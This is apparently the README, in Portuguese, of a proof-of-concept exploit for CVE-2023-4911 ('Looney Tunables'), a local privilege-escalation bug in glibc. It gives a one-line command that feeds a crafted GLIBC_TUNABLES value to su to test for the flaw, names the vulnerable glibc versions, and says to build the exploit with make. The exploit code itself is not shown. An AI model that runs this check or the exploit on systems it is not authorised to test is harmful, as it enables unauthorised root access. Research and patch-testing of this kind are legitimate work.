
CVE-2023-4911
Este é um PoC (Prova de Conceito) para a vulnerabilidade de escalada de privilégios no Linux Looney Tunables. Baseia-se neste PoC. Muito obrigado a leesh3288. Aqui você pode encontrar um writeup bem detalhado, e aqui você pode ver um vídeo muito legal do IppSec.
Verifique se é vulnerável
env -i "GLIBC_TUNABLES=glibc.malloc.mxfast=glibc.malloc.mxfast=A" "Z=`printf '%08192x' 1`" /usr/bin/su --help

Vale ressaltar que as versões vulneráveis do glibc, incluindo esta, são da 2.35-0ubuntu3.3 e anteriores.

Execute o exploit
$ make
